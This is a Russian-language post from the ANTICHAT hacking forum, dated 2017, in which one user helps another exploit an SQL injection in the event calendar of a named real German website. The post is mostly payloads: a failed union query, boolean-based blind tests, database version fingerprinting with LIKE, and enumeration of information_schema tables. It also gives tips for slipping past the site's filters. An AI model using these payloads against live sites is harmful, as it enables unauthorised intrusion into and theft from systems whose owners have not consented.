Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

05.04.2017, 20:14

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от DezMond™

DezMond™ said:
↑
помогите вывод сделать, тайм бейс не крутит(

Код:

Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+

вывод через union мне добиться не удалось, но там boolen есть

Код:

Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'

118)/**/AND/**/1=1+--+s' | grep 'event_417'

хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6

Код:

Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'

к information_schema тоже доступ есть

Код:

Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'

ещё там операция = не всегда работает, лучше юзать like

скульмап по какой то причине в упор скулю не видит

-----------

чорт, там запятая фильтруется -_-